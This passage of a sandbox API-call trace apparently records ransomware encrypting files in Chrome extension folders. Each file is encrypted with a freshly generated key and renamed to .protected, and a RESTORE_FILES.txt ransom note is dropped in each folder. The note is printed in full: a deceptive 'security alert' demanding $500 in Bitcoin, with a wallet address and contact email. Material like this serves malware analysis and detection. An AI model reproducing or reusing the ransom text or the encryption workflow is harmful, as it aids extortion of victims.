Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\en_GB\\messages.json") returned 159 [0079.251] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0079.251] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\en_GB\\messages.json") returned 159 [0079.251] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0079.251] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xf9, lpOverlapped=0x0) returned 1 [0079.252] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff07, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.252] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xf9, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xf9, lpOverlapped=0x0) returned 1 [0079.252] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.252] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0079.252] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0079.252] CloseHandle (hObject=0x168) returned 1 [0079.253] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\en_GB\\messages.json.protected") returned 169 [0079.253] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\en_GB\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\en_gb\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\en_GB\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\en_gb\\messages.json.protected")) returned 1 [0079.253] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0079.253] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0079.253] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\en_GB\\RESTORE_FILES.txt") returned 163 [0079.253] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\en_GB\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\en_gb\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 
0x164 [0079.254] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0079.254] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0079.255] lstrlenA (lpString="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") returned 684 [0079.255] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, 
lpOverlapped=0x0) returned 1 [0079.255] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0079.255] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0079.255] CloseHandle (hObject=0x164) returned 1 [0079.255] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0079.255] lstrcmpiW (lpString1="en_US", lpString2="Windows") returned -1 [0079.255] lstrcmpiW (lpString1="en_US", lpString2="Program Files") returned -1 [0079.255] lstrcmpiW (lpString1="en_US", lpString2="Program Files (x86)") returned -1 [0079.255] lstrcmpiW (lpString1="en_US", lpString2="$Recycle.bin") returned 1 [0079.255] lstrcmpiW (lpString1="en_US", lpString2="System Volume Information") returned -1 [0079.255] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\en_US") returned 145 [0079.255] lstrcmpW (lpString1="en_US", lpString2=".") returned 1 [0079.255] lstrcmpW (lpString1="en_US", lpString2="..") returned 1 [0079.255] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\en_US\\*") returned 147 [0079.255] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\en_US\\*", lpFindFileData=0x295d930 | out: 
lpFindFileData=0x295d930) returned 0x47bc10 [0079.256] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0079.256] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0079.256] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0079.256] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0079.256] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0079.256] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\en_US\\.") returned 147 [0079.256] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.256] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.256] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0079.256] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0079.256] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0079.256] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0079.256] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0079.256] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\en_US\\..") returned 148 [0079.256] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.256] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.256] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.256] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0079.256] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0079.256] lstrcmpiW 
(lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0079.256] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0079.256] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0079.256] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\en_US\\messages.json") returned 159 [0079.256] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0079.256] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0079.256] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0079.256] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0079.256] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\en_US\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\en_us\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0079.257] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\en_US\\messages.json") returned 159 [0079.257] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0079.257] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\en_US\\messages.json") returned 159 [0079.257] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0079.258] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\en_US\\messages.json") returned 159 [0079.258] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0079.258] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xf9, lpOverlapped=0x0) returned 1 [0079.258] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff07, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.258] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xf9, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xf9, lpOverlapped=0x0) returned 1 [0079.259] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.259] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0079.259] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0079.259] CloseHandle (hObject=0x168) returned 1 [0079.259] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\en_US\\messages.json.protected") returned 169 [0079.259] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\en_US\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\en_us\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\en_US\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\en_us\\messages.json.protected")) returned 1 [0079.260] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0079.260] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0079.260] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\en_US\\RESTORE_FILES.txt") returned 163 [0079.260] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\en_US\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\en_us\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 
0x164 [0079.260] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0079.260] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0079.261] lstrlenA (lpString="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") returned 684 [0079.261] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, 
lpOverlapped=0x0) returned 1 [0079.261] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0079.261] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0079.261] CloseHandle (hObject=0x164) returned 1 [0079.261] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0079.261] lstrcmpiW (lpString1="es", lpString2="Windows") returned -1 [0079.261] lstrcmpiW (lpString1="es", lpString2="Program Files") returned -1 [0079.261] lstrcmpiW (lpString1="es", lpString2="Program Files (x86)") returned -1 [0079.261] lstrcmpiW (lpString1="es", lpString2="$Recycle.bin") returned 1 [0079.261] lstrcmpiW (lpString1="es", lpString2="System Volume Information") returned -1 [0079.262] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\es") returned 142 [0079.262] lstrcmpW (lpString1="es", lpString2=".") returned 1 [0079.262] lstrcmpW (lpString1="es", lpString2="..") returned 1 [0079.262] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\es\\*") returned 144 [0079.262] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\es\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 
0x47bc10 [0079.262] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0079.262] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0079.262] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0079.262] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0079.262] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0079.262] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\es\\.") returned 144 [0079.262] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.262] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.262] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0079.262] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0079.262] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0079.262] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0079.262] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0079.262] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\es\\..") returned 145 [0079.262] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.262] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.262] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.262] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0079.262] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0079.262] lstrcmpiW (lpString1="messages.json", lpString2="Program 
Files (x86)") returned -1 [0079.263] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0079.263] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0079.263] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\es\\messages.json") returned 156 [0079.263] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0079.263] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0079.263] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0079.263] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0079.263] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\es\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\es\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0079.263] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\es\\messages.json") returned 156 [0079.263] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0079.263] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\es\\messages.json") returned 156 [0079.263] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0079.263] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\es\\messages.json") returned 156 [0079.263] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0079.263] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x103, lpOverlapped=0x0) returned 1 [0079.264] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffefd, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.264] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x103, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x103, lpOverlapped=0x0) returned 1 [0079.264] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.264] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0079.265] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0079.265] CloseHandle (hObject=0x168) returned 1 [0079.265] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
